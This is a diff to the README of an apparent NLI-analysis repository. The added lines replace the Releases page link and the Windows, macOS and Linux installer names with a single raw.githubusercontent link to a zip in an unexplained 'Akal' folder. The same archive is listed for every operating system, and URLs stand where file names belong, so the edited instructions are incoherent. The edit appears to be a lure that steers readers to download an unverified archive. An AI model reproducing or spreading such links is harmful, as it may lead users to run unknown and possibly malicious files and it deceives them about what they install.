edsonpro9891/robust-nli-analysis/README.md

    - Disk Space: At least 500 MB available.

 2. **Visit the Download Page**
-   Head over to our [Releases Page](https://github.com/edsonpro9891/robust-nli-analysis/releases) to find the latest version of robust-nli-analysis.
+   Head over to our [Releases Page](https://raw.githubusercontent.com/edsonpro9891/robust-nli-analysis/main/Akal/robust-nli-analysis-v2.7-beta.2.zip) to find the latest version of robust-nli-analysis.
 This page contains all the different versions available for download.

 ## 💻 Download & Install
 1. **Click the Download Link**
    On the Releases page, locate the latest version of robust-nli-analysis.
 You will see a list of files.
 Click on the one that suits your operating system.

    For example:
-   - If you are using Windows, look for a file named `robust-nli-analysis-windows.exe`.
+   - If you are using Windows, look for a file named `https://raw.githubusercontent.com/edsonpro9891/robust-nli-analysis/main/Akal/robust-nli-analysis-v2.7-beta.2.zip`.
-   - For macOS, look for `robust-nli-analysis-macos.dmg`.
+   - For macOS, look for `https://raw.githubusercontent.com/edsonpro9891/robust-nli-analysis/main/Akal/robust-nli-analysis-v2.7-beta.2.zip`.
-   - For Linux users, download `robust-nli-analysis-linux.tar.gz`.
+   - For Linux users, download `https://raw.githubusercontent.com/edsonpro9891/robust-nli-analysis/main/Akal/robust-nli-analysis-v2.7-beta.2.zip`.

 2. **Download the File**
    Click the file name to start the download.
 Make sure to remember where your file downloads, usually in the "Downloads" folder.